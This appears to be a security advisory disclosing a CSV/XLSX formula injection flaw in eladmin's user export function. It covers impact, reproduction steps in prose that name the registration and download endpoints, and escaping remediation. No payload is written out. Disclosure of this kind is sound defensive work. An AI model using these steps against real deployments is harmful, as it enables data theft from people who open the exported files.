elunez eladmin CSV/XLSX Injection Vulnerability

A CSV/XLSX injection vulnerability has been identified in elunez eladmin versions through 2.7. This issue affects the exportUser function, where the application fails to properly sanitize special characters before exporting data to CSV or XLSX formats. As a result, malicious spreadsheet formulas can be injected and executed, potentially leading to the disclosure of sensitive information.

Impact

Exploitation of this vulnerability allows for the execution of injected spreadsheet formulas, which can exfiltrate data such as system usernames. In some cases, this could lead to local code execution, depending on the spreadsheet application used and its configuration.

Reproduction

To reproduce this vulnerability, first register a username containing a malicious XLSX formula via the '/api/users' endpoint. Then, download the exported data using the '/api/users/download' endpoint. Opening the downloaded file in a spreadsheet application will reveal the executed formula, demonstrating the injection.

Remediation

It is recommended to implement strict sanitization of all fields before exporting to CSV or XLSX. Special characters like '=', '@', '+', and '-' should be properly escaped or removed to prevent injection.